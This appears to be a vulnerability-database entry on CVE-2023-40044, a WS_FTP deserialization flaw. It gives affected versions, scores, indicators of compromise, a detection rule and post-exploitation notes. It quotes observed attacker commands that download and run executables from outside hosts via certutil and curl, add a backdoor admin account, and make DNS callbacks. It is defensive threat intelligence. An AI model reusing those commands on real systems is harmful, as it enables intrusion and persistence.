cbcvebase.
CVE-2023-40044
published 2023-09-27

CVE-2023-40044: In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer…

PriorityP198high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2023-10-26
Exploited in the wild
EPSS
90.15%
99.8th percentile
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.

Affected

4 ranges
VendorProductVersion rangeFixed in
progressws_ftp_server< 8.7.48.7.4
progressws_ftp_server>= 8.8 < 8.8.28.8.2
progress_software_corporationws_ftp_server>= 8.7.0 < 8.7.48.7.4
progress_software_corporationws_ftp_server>= 8.8.0 < 8.8.28.8.2

Detection & IOCsextracted from sources · hover to see the quote

ip103.163.187.12
ip34.77.65.112
ip45.93.138.44
ip81.19.135.226
ip141.255.167.250
ip176.105.255.46
urlhxxp://103.163.187.12:8080/3P37p073LKuQjOE64pjEVw
urlhxxp://103.163.187.12:8080/c8e3vG0e3TMiqcjcZOXhhA
urlhxxp://103.163.187.12:8080/cz3eKnhcaD0Fik7Eexo66A
urlhxxp://103.163.187.12:8080/Sw8J6d3NVuvrBiTCXrg4Og
urlhxxp://103.163.187.12:8080/xkJ5de2brMfvCNNnBoRRAg
urlhxxp://141.255.167.250:8081/o1X7qlIaYzSmCj.hta
urlhxxp://176.105.255.46:8080/aqmCG0mZlo_xnZRAWbz6MQ
urlhxxp://176.105.255.46:8080/OFmLqOxFRIkoENjCZsC7OQ
urlhxxp://176.105.255.46:8080/Rn0KQbPo22laaUbKGy30sg
urlhxxp://81.19.135.226:8080/_1TZ--18Hpqm06wvtjLMAg
urlhxxps://filebin.net/soa40iww2w8jhgnd/svchostt.dll
urlhxxps://tmpfiles.org/dl/2669123/client.txt
urlhxxps://tmpfiles.org/dl/2669853/client.txt
urlhxxps://tmpfiles.org/dl/2671793/sl.txt
urlhxxp://34.77.65.112:25565
domain2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com
domainbgvozb1wnz86q952zxjlwusv2m8gw5.oastify.com
domainqzt3iqkb6erl9oohic20f9bal1rsfh.oastify.com
hash83140ae9951b66fba6da07e04bfbba4e9228cbb8
hash1d41e0783c523954ad12d950c3805762a1218ba6
hash1d7b08bf5ca551272066f40d8d55a7c197b2f590
hash32548a7ef421e8e838fa31fc13723d44315f1232
hash3fe67f2c719696b7d02a3c648803971d4d1fd18c
hash40b2d3a6a701423412bb93b7c259180eb1221d68
hash65426816ef29c736b79e1969994adf2e74b10ad8
hash790dcfb91eb727b04d348e2ed492090d16c6dd3e
hash83e6ede4c5f1c5e4d5cd12242b3283e9c48eea7e
hash8c14a4e7cee861b2fad726fc8dd0e0ae27164890
hash8dbca2f55c2728b1a84f93141e0b2a5b87fa7d35
hash923fd8fb3ddc1358cc2791ba1931bb4b29580bb6
hash98321d034ddc77fe196c6b145f126b0477b32db9
hashb4a5bf6c9f113165409c35726aec67ff66490787
hashb70aa1d07138b5cae8dd95feba9189f1238ee158
hashd00169f5eff9e0f2b5b1d473c0ee4fe9a3d8980e
hashd669b3977ebebf7611dd2cb1d09c31b3f506e9bd
hashe5ac227f143ec3f815e475c0b4f4f852565e1e76
hashf045a41def1752e7f8ef38d4ce1f7bd5e01490fc
filenamexmpp.exe
pathC:\programdata\ft.exe
filenamesvchostt.dll
command/c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string} %TEMP%\{10-length-alpha-string}.exe & start /B %TEMP%\{same-10-length-alpha-string}.exe
command/c cmd.exe /C curl 45[.]93[.]138[.]44/cl.exe -o C:/cl.exe
command-i -c "cmd /c net user temp p@ssw0rd123 /add && net localgroup administrators temp /add"
command/c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2[.]oastify[.]com
sigma
endpoint.os = 'windows' AND event.category = 'process' AND src.process.name in:anycase ('w3wp.exe') AND src.process.cmdline contains 'WSFTPSVR_WTM' AND tgt.process.cmdline contains ('certutil', 'mshta', 'powershell', 'pwsh', 'cmd', 'curl', 'wmic', 'nslookup', 'ping', 'whoami')
  • Post-exploitation Attack Chain 1: w3wp.exe (WSFTPSVR_WTM) spawns PowerShell that decodes a Base64/Gzip payload, then uses certutil with -urlcache -f to download and execute a payload from an IP-literal URL on port 8080.
  • Post-exploitation Attack Chain 2: w3wp.exe spawns curl to download cl.exe from attacker-controlled infrastructure, then executes it. Also uses tmpfiles.org and oastify.com (Burp Collaborator) domains for payload delivery and OOB callback.
  • Post-exploitation Attack Chain 3: Attacker drops executables (n1.exe, n2.exe, s.exe, xmpp.exe, ft.exe) to C:\ProgramData, creates a local admin account named 'temp' with password 'p@ssw0rd123', and uses nslookup for OOB DNS callbacks to oastify.com subdomains.
  • Rapid7 observed the same Burp Suite (oastify.com) domain used across all incidents, suggesting a single threat actor or shared tooling. Oastify.com subdomains in DNS/network logs are a strong indicator of exploitation activity.
  • The process execution chain is consistent across all observed exploitation instances, indicating likely mass exploitation. The parent process is always w3wp.exe with the WSFTPSVR_WTM application pool.
  • Ransomware actors used the open-source GodPotato tool for privilege escalation to NT AUTHORITY\SYSTEM after exploiting CVE-2023-40044. Monitor for GodPotato execution following w3wp.exe activity.
  • ·Approximately 2,900 WS_FTP hosts were internet-exposed with their webserver accessible at time of disclosure; exploitation requires the webserver component to be reachable.
  • ·The only complete remediation is upgrading to WS_FTP Server 8.7.4 or 8.8.2 using the full installer; partial updates are insufficient.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.